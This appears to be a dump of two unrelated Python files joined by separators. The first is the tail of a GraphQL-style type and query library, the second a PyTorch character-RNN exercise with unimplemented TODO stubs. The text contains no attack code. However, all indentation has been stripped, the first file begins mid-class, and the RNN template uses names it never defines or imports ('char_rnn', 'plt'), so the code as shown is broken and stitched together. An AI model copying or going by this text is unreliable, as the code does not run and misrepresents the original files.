return ListQuery(self, self.element_type.query(*args, **kwargs))
def __eq__(self, other):
if isinstance(other, ListType):
return self.element_type == other.element_type
else:
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.element_type)
def __repr__(self):
return "ListType(element_type={!r})".format(self.element_type)
def __str__(self):
return "List({})".format(self.element_type)
def child_types(self):
return (self.element_type, )
def coerce(self, value):
return [
self.element_type.coerce(element)
for element in value
]
class ListQuery(object):
def __init__(self, type, element_query):
self.type = type
self.element_query = element_query
def for_type(self, target_type):
if isinstance(target_type, ListType):
element_query = self.element_query.for_type(target_type.element_type)
return ListQuery(type=target_type, element_query=element_query)
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, ListQuery):
return NotImplemented
elif self.type.element_type != other.type.element_type:
raise TypeError("cannot add queries for lists with different element types: {} and {}".format(
self.type.element_type,
other.type.element_type,
))
else:
return ListQuery(type=self.type, element_query=self.element_query + other.element_query)
def __str__(self):
return _format_call_tree("ListQuery", (
("type", self.type),
("element_query", self.element_query),
))
class NullableType(object):
def __init__(self, element_type):
self.element_type = element_type
def __call__(self, *args, **kwargs):
return NullableQuery(self, self.element_type(*args, **kwargs))
def query(self, *args, **kwargs):
return NullableQuery(self, self.element_type.query(*args, **kwargs))
def __eq__(self, other):
if isinstance(other, NullableType):
return self.element_type == other.element_type
else:
return NotImplemented
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.element_type)
def __str__(self):
return "Nullable({})".format(self.element_type)
def __repr__(self):
return "NullableType(element_type={!r})".format(self.element_type)
def child_types(self):
return (self.element_type, )
def coerce(self, value):
if value is None:
return None
else:
return self.element_type.coerce(value)
class NullableQuery(object):
def __init__(self, type, element_query):
self.type = type
self.element_query = element_query
def for_type(self, target_type):
if isinstance(target_type, NullableType):
element_query = self.element_query.for_type(target_type.element_type)
return NullableQuery(type=target_type, element_query=element_query)
else:
raise _query_coercion_error(self.type, target_type)
def __add__(self, other):
if not isinstance(other, NullableQuery):
return NotImplemented
elif self.type.element_type != other.type.element_type:
raise TypeError("cannot add queries for nullables with different element types: {} and {}".format(
self.type.element_type,
other.type.element_type,
))
else:
return NullableQuery(type=self.type, element_query=self.element_query + other.element_query)
def __str__(self):
return _format_call_tree("NullableQuery", (
("type", self.type),
("element_query", self.element_query),
))
class ObjectType(object):
def __init__(self, name, fields, interfaces=None):
if interfaces is None:
interfaces = ()
self.name = name
if not callable(fields):
fields = lambdaize(fields)
def owned_fields():
return tuple(
field.with_owner_type(self)
for field in fields()
)
self.fields = Fields(name, owned_fields)
# TODO: validation of interfaces, especially default values of arguments
self._interfaces = memoize(interfaces)
@property
def interfaces(self):
return self._interfaces()
def __call__(self, *field_queries):
return ObjectQuery.create(self, field_queries=field_queries)
def query(self, *, field_queries, create_object):
return ObjectQuery.create(self, field_queries=field_queries, create_object=create_object)
def __repr__(self):
return "ObjectType(name={!r})".format(self.name)
def __str__(self):
return self.name
def child_types(self):
return _fields_child_types(self.fields) + tuple(self.interfaces)
def _fields_child_types(fields):
return tuple(
child_type
for field in fields
for child_type in field.child_types()
)
class Fields(object):
def __init__(self, type_name, fields):
self._type_name = type_name
self._fields = memoize(fields)
def __iter__(self):
return iter(self._fields())
def __getattr__(self, field_name):
field = self._find_field(field_name)
if field is None and field_name.endswith("_"):
field = self._find_field(field_name[:-1])
if field is None:
raise GraphError("{} has no field {}".format(self._type_name, field_name))
else:
return field
def _find_field(self, field_name):
return iterables.find(lambda field: field.name == field_name, self._fields(), default=None)
class ObjectQuery(object):
@staticmethod
def create(type, *, field_queries, create_object=None):
if create_object is None:
create_object = Object
return ObjectQuery(type, field_queries=field_queries, create_object=create_object)
def __init__(self, type, field_queries, *, create_object):
self.type = type
# TODO: check field queries are valid
self.field_queries = tuple(field_queries)
self.create_object = create_object
# TODO: handling merging of other query types
def __add__(self, other):
if isinstance(other, ObjectQuery):
assert self.type == other.type
field_queries = list(map(
_merge_field_queries,
iterables.to_multidict(
((field.field, field.key), field)
for field in (self.field_queries + other.field_queries)
).values(),
))
return ObjectQuery(
type=self.type,
field_queries=field_queries,
create_object=self.create_object,
)
else:
return NotImplemented
def for_type(self, target_type):
if self.type == target_type:
return self
elif self._is_in_type_hierarchy(target_type):
field_queries = _field_queries_for_type(self.field_queries, target_type)
return ObjectQuery(
type=target_type,
field_queries=field_queries,
create_object=self.create_object,
)
else:
raise _query_coercion_error(self.type, target_type)
def _is_in_type_hierarchy(self, target_type):
return (
(
isinstance(self.type, InterfaceType) and
isinstance(target_type, ObjectType) and
self.type in target_type.interfaces
) or
(
isinstance(self.type, ObjectType) and
isinstance(target_type, InterfaceType) and
target_type in self.type.interfaces
)
)
def __str__(self):
field_queries = _format_tuple(
str(field_query)
for field_query in self.field_queries
)
return _format_call_tree("ObjectQuery", (
("type", self.type.name),
("field_queries", field_queries),
))
def _field_queries_for_type(field_queries, target_type):
if isinstance(target_type, InterfaceType):
return field_queries
else:
supertype_fields = frozenset(
field
for possible_type in target_type.interfaces
for field in possible_type.fields
)
def field_query_for_type(field_query):
# TODO: test typename_field outside of GraphQL
if field_query.field in target_type.fields or field_query.field == typename_field:
return field_query
elif field_query.field in supertype_fields:
field = iterables.find(
lambda field: field.name == field_query.field.name,
target_type.fields,
)
return field_query.for_field(field)
else:
# TODO: include subtype fields
return None
return tuple(filter(None, map(field_query_for_type, field_queries)))
def _merge_field_queries(fields):
return reduce(
lambda left, right: left + right,
fields,
)
class Args(object):
pass
def field(name, type, params=None):
if params is None:
params = ()
return Field(owner_type=None, name=name, type=type, params=params)
class Field(object):
def __init__(self, owner_type, name, type, params):
self.owner_type = owner_type
self.name = name
self.type = type
self.params = Params(name, params)
def with_owner_type(self, owner_type):
return Field(owner_type=owner_type, name=self.name, type=self.type, params=self.params)
def __call__(self, *args):
field_queries, field_args = _partition_by_type(args, (FieldQuery, Argument))
type_query = self.type(*field_queries)
# TODO: handle extra args
return self.query(key=self.name, type_query=type_query, args=field_args)
def query(self, args, key, type_query):
explicit_args = iterables.to_dict(
(arg.parameter.name, arg.value)
for arg in args
)
def get_arg(param):
value = explicit_args.get(param.name, param.default)
if value is _undefined:
raise GraphError("field {} is missing required argument {}".format(self.name, param.name))
else:
return value
field_args = Object(iterables.to_dict(
(param.name, get_arg(param))
for param in self.params
))
return FieldQuery(key=key, field=self, type_query=type_query.for_type(self.type), args=field_args)
def __repr__(self):
return "Field(name={!r}, type={!r})".format(self.name, self.type)
def child_types(self):
return (self.type, ) + tuple(
param.type
for param in self.params
)
def _partition_by_type(values, types):
results = tuple([] for type in types)
for value in values:
potential_results = [
result
for type, result in zip(types, results)
if isinstance(value, type)
]
if potential_results:
potential_results[0].append(value)
else:
raise GraphError("unexpected argument: {!r}\nExpected arguments of type {} but had type {}".format(
value,
" or ".join(sorted([type.__name__ for type in types])),
type(value).__name__,
))
return results
class Params(object):
def __init__(self, field_name, params):
self._field_name = field_name
self._params = params
def __iter__(self):
return iter(self._params)
def __getattr__(self, param_name):
param = self._find_param(param_name)
if param is None and param_name.endswith("_"):
param = self._find_param(param_name[:-1])
if param is None:
raise GraphError("{} has no param {}".format(self._field_name, param_name))
else:
return param
def _find_param(self, param_name):
return iterables.find(lambda param: param.name == param_name, self._params, default=None)
class FieldQuery(object):
def __init__(self, key, field, type_query, args):
self.key = key
self.field = field
self.type_query = type_query
self.args = args
def __add__(self, other):
if isinstance(other, FieldQuery):
assert self.key == other.key
assert self.field == other.field
assert self.args == other.args
return FieldQuery(
key=self.key,
field=self.field,
type_query=self.type_query + other.type_query,
args=self.args,
)
else:
return NotImplemented
def for_field(self, field):
# TODO: deal with nullability changes?
return FieldQuery(
key=self.key,
field=field,
type_query=self.type_query,
args=self.args,
)
def __str__(self):
field = "{}.fields.{}".format(self.field.owner_type.name, self.field.name)
args = _format_tuple(
"{}.params.{}({})".format(field, param.name, getattr(self.args, param.name))
for param in self.field.params
)
return _format_call_tree("FieldQuery", (
("key", '"{}"'.format(self.key)),
("field", field),
("type_query", self.type_query),
("args", args),
))
def key(key, field_query):
return FieldQuery(
key=key,
field=field_query.field,
type_query=field_query.type_query,
args=field_query.args,
)
def param(name, type, default=_undefined):
return Parameter(name=name, type=type, default=default)
class Parameter(object):
def __init__(self, name, type, default):
self.name = name
self.type = type
self.default = default
@property
def has_default(self):
return self.default is not _undefined
def __call__(self, value):
return Argument(parameter=self, value=self.type.coerce(value))
class Argument(object):
def __init__(self, parameter, value):
self.parameter = parameter
self.value = value
def collect_types(types):
all_types = set()
def collect(graph_type):
if graph_type is not None and graph_type not in all_types:
all_types.add(graph_type)
for child in graph_type.child_types():
collect(child)
for graph_type in types:
collect(graph_type)
return all_types
def _format_call_tree(receiver, args):
return "{}({}\n)".format(receiver, "".join(
_indent("\n{}={},".format(key, value))
for key, value in args
))
def _format_tuple(elements):
elements = tuple(elements)
if elements:
return "(" + _indent("".join(
"\n" + element + ","
for element in elements
)) + "\n)"
else:
return "()"
def _indent(value):
return value.replace("\n", "\n ")
def _coercion_error(value, target_type):
return GraphError("cannot coerce {!r} to {}".format(value, target_type))
def _query_coercion_error(source_type, target_type):
return TypeError("cannot coerce query for {} to query for {}".format(
source_type,
target_type,
))
typename_field = field("type_name", type=String)
def to_element_type(graph_type):
if isinstance(graph_type, (ListType, NullableType)):
return to_element_type(graph_type.element_type)
else:
return graph_type
def replace_element_type(graph_type, element_type):
if isinstance(graph_type, ListType):
return ListType(replace_element_type(graph_type.element_type, element_type))
elif isinstance(graph_type, NullableType):
return NullableType(replace_element_type(graph_type.element_type, element_type))
else:
return element_type
|
import torch
import numpy as np
from torch import nn
import torch.nn.functional as F
from IPython.display import clear_output
def make_tokens(input_text):
r"""Makes a list of all unique characters in the `input_text`.
Parameters
----------
input_text : str
Input text for RNN training. Should be a simple plain text file.
Returns
-------
tokens : list of str
List with all unique tokens.
"""
# Your final implementation shouldn't have any loops
# TODO: implement make_tokens
raise NotImplementedError('Not implemented!')
def make_token_to_id(tokens):
r"""Creates a mapping between tokens and its int identifiers.
Parameters
----------
tokens : list of str
List with all unique tokens.
Returns
-------
token_to_id : dict of str
Tokens to its identifier (index in tokens list).
"""
# TODO: implement make_token_to_id
raise NotImplementedError('Not implemented!')
class CharRNNCell(nn.Module):
r"""Vanilla RNN cell with tanh non-linearity.
Parameters
----------
num_tokens : int
Size of the token dictionary.
embedding_size : int
Size of the token embedding vector.
rnn_num_units : int
A number of features in the hidden state vector.
Attributes
----------
num_units : int
A number of features in the hidden state vector.
embedding : nn.Embedding
An embedding layer that converts character id to a vector.
rnn_update : nn.Linear
A linear layer that creates a new hidden state vector.
rnn_to_logits : nn.Linear
An output layer that predicts probabilities of next phoneme.
"""
def __init__(self, num_tokens, embedding_size=16, rnn_num_units=64):
super(self.__class__, self).__init__()
self.num_units = rnn_num_units
self.embedding = nn.Embedding(num_tokens, embedding_size)
self.rnn_update = nn.Linear(
embedding_size + rnn_num_units,
rnn_num_units,
)
self.rnn_to_logits = nn.Linear(rnn_num_units, num_tokens)
def forward(self, x, h_prev):
r"""Compute h_next(x, h_prev) and log(P(x_next | h_next)).
We'll call it repeatedly to produce the whole sequence.
Parameters
----------
x : torch.LongTensor, shape(batch_size)
Batch of character ids.
h_prev : torch.FloatTensor, shape(batch_size, num_units)
Previous rnn hidden states.
Returns
-------
h_next : torch.FloatTensor, shape(batch_size, num_units)
Next rnn hidden states.
x_next_proba : torch.FloatTensor, shape(batch_size, num_tokens)
Predicted probabilities for the next token.
"""
# get vector embedding of x
x_emb = self.embedding(x)
# TODO: compute next hidden state using self.rnn_update
# hint: use torch.cat(..., dim=...) for concatenation
raise NotImplementedError('Not implemented!')
h_next = ...
h_next = torch.tanh(h_next)
# TODO: compute logits for next character probs
raise NotImplementedError('Not implemented!')
logits = ...
return h_next, F.log_softmax(logits, -1)
def initial_state(self, batch_size):
r"""Returns rnn state before it processes first input (aka h_0)."""
return torch.zeros(batch_size, self.num_units)
def rnn_loop(char_rnn, batch_ix):
r"""Computes log P(next_character) for all time-steps in lines_ix."""
batch_size, max_length = batch_ix.size()
hid_state = char_rnn.initial_state(batch_size)
log_probs = []
for x_t in batch_ix.transpose(0, 1):
hid_state, log_p_next = char_rnn(x_t, hid_state)
log_probs.append(log_p_next)
return torch.stack(log_probs, dim=1)
def train_rnn(encoded_lines, model, optimizer, iterations=1000):
r"""Trains RNN on a given text.
Parameters
----------
encoded_lines : np.ndarray, shape(n_samples, MAX_LENGTH)
Lines of input text converted to a matrix.
model : torch.nn.Module
A model to train.
optimizer : torch.optim.Optimizer
Optimizer that will be used to train a model.
iterations : int, optional
Number of optimization steps that the model will make.
Returns
-------
training_history : list of float
Training history consisting of mean-loss-per-iteration records.
"""
training_history = []
for i in range(iterations):
batch_indices = np.random.choice(len(encoded_lines), 32, replace=False)
batch_ix = encoded_lines[batch_indices]
batch_ix = torch.tensor(batch_ix, dtype=torch.int64)
# TODO: implement train loop
raise NotImplementedError('Not implemented!')
log_p_seq = rnn_loop(char_rnn, batch_ix)
# TODO: compute loss
loss = ...
# TODO: train with backprop
training_history.append(loss.item())
if (i + 1) % 100 == 0:
clear_output(True)
plt.plot(training_history, label='loss')
plt.legend()
plt.show()
return training_history
|
Subsets and Splits